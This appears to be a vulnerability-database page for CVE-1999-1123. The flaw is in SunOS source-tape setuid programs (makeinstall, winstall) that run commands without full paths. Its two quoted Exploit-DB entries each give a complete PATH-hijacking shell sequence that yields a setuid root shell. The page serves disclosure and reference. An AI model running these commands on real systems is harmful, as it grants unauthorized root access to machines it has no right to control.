CVE-1999-1123
Published: 1991-05-20
CVE-1999-1123: The installation of Sun Source (sunsrc) tapes allows local users to gain root privileges via setuid root programs (1) makeinstall or (2) winstall.
Priority P426 | high | 7.2 | CVSS 2.0
CVSS vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.13% (62.2th percentile)
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sun | sunos | — | — |
| sun | sunos | — | — |
| sun | sunos | — | — |
No detection rules found.
Exploit-DB
SunOS 4.1.1 - '/usr/release/bin/makeinstall' Local Privilege Escalation
exploitdb·1999-11-23
---
source: https://www.securityfocus.com/bid/21/info
This applies to sites that have installed Sun Source tapes only.
The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or resetting the PATH environment variable.
This makes it possible for users on that system to become root.
$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/make
$ chmod a+rx /tmp/make
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/makeinstall
$ /tmp/sh
#
Exploit-DB
SunOS 4.1.1 - '/usr/release/bin/winstall' Local Privilege Escalation
exploitdb·1999-11-12
---
source: https://www.securityfocus.com/bid/22/info
This applies to sites that have installed Sun Source tapes only.
The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or resetting the PATH environment variable.
This makes it possible for users on that system to become root.
$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/install
$ chmod a+rx /tmp/install
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/winstall
$ /tmp/sh
#
No writeups or analysis indexed.
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/107&type=0&nav=sec.sba
http://www.cert.org/advisories/CA-1991-07.html
http://www.securityfocus.com/bid/21
http://www.securityfocus.com/bid/22
https://exchange.xforce.ibmcloud.com/vulnerabilities/582